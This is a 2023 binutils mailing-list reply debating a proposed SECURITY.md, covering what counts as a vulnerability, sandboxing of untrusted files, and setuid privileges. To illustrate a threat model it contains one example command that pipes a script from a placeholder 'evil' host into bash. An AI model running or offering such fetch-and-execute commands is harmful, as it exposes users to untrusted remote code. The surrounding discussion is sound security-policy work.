Date: Thu, 13 Apr 2023 08:54:51 -0400
Subject: Re: RFC: Adding a SECURITY.md document to the Binutils
From: Siddhesh Poyarekar
To: Richard Earnshaw, Nick Clifton, Binutils
Cc: gdb@sourceware.org

On 2023-04-13 08:37, Richard Earnshaw wrote:
>> "Direct compromise of security" is essentially what we're trying to
>> define more strongly to prevent spurious CVE assignments.
>
> If a user can be tricked into opening a corrupt file (eg object file)
> and that causes a buffer overflow that's then used to send another file
> to a third party, you can't really pretend that's not a direct
> compromise of security.  We live in the real world and this sort of
> threat is real.

I agree that this sort of threat is real, which is why we should
recommend sandboxing to deal with corrupt/untrusted files.  There is no
way that any program can be secured against untrusted input *after* it
has been supplied to it, especially if the input is in a Turing complete
form, like a program or a script.  This is why when one does a:

    curl -s http://evil.website/malicious-script.sh | bash

it is a legitimate security issue, but it's not a vulnerability in bash,
nor can it be secured in bash.  One must either do this in a sandbox to
contain its impact in that sandbox, or do a secondary analysis (again in
a sandbox) to determine that it is safe.

>>> a vulnerability in the generated output that was not already present
>>> in the files used as input.
>>>
>>> Note: none of the programs in the GNU Binutils suite need elevated
>>> system privileges (eg setuid) to operate and we recommend that users
>>> do not use them from accounts where such privileges are automatically
>>> available.
>>
>> We did have CVE-2021-20197, so it's not always setuid.
>
> Which is exactly the sort of scenario I was trying to exclude by this
> statement - don't run the tools with elevated privileges.

I should have clarified that I agree, just that mentioning setuid might
lull users into believing that this threat model is only related to
setuid.

Sid